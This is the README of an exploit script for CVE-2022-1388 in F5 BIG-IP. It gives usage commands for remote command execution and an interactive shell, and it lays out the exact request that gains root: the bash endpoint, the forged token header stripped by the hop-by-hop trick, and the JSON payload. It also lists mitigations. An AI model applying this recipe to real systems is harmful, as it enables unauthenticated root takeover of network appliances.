
# CVE-2022-1388 – F5 BIG-IP iControl REST Authentication Bypass RCE

This Python script exploits CVE-2022-1388, a critical vulnerability in F5 BIG-IP iControl REST that allows unauthenticated remote command execution via improper access control and HTTP header handling.

⚠️ For educational and authorized security research only. Do not use against systems you do not own or have explicit permission to test.

## Vulnerability Summary

- CVE ID: CVE-2022-1388
- Vendor: F5 Networks
- Affected Product: BIG-IP 16.1.x, 15.1.x, 14.1.x and 13.1.x before the fixed releases (17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, 13.1.5); the end-of-support 12.1.x and 11.6.x branches are affected and will not be fixed
- Impact: Remote attackers can bypass iControl REST authentication and execute arbitrary system commands as root via crafted HTTP requests

## Features

- Remote command execution via the iControl REST API
- Optional interactive shell (`--shell`)
- Custom HTTP basic authentication credentials (`-a user:pass`)
- SSL verification disabled (for self-signed certs)

## Usage

```bash
python3 cve_2022_1388_exploit.py -u <target_url> -c "<command>"
```

## Examples

Run a Single Command

```bash
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -c "id"
```

Run with Custom Credentials

```bash
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -a "root:password" -c "whoami"
```

Start Interactive Shell

```bash
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 --shell
```

## How It Works

1. The script sends a POST request to `/mgmt/tm/util/bash` carrying a forged `X-F5-Auth-Token` header and an HTTP basic `Authorization` header.
2. The `Connection` header lists `X-F5-Auth-Token` as a hop-by-hop header, so the front-end httpd strips it before proxying the request to the Jetty backend that serves iControl REST. Having seen no token, the backend falls back to the `Authorization` header and accepts the named local user without verifying the password.
3. The JSON payload (`{"command": "run", "utilCmdArgs": "-c '<command>'"}`) makes the bash utility endpoint run the specified shell command; its output comes back in the `commandResult` field of the JSON response.

## Mitigation

Upgrade to a patched F5 BIG-IP version as recommended by F5 (advisory K23605346). Until you can upgrade, block iControl REST access through self IPs and restrict the management interface to trusted networks; both temporary mitigations are documented in the same F5 article.